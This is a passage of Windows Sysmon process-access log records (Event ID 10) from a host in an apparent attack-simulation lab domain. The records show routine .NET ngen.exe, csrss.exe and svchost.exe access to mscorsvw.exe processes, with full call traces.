08:04:01.992","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F1-5F25-0000-0010FA690A00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:01.992\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F1-5F25-0000-0010FA690A00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:01.992","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F1-5F25-0000-0010FA690A00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:01.992\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F1-5F25-0000-0010FA690A00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:01.992","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F1-5F25-0000-0010FA690A00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.039\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F2-5F25-0000-00104F6D0A00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.039","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F2-5F25-0000-00104F6D0A00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.039\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F2-5F25-0000-00104F6D0A00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.039","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F2-5F25-0000-00104F6D0A00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F2-5F25-0000-00104F6D0A00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F2-5F25-0000-00104F6D0A00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.086\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F2-5F25-0000-001077700A00}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.086","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F2-5F25-0000-001077700A00}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.086\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F2-5F25-0000-001077700A00}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.086","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F2-5F25-0000-001077700A00}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.086\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F2-5F25-0000-001077700A00}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.086","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F2-5F25-0000-001077700A00}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
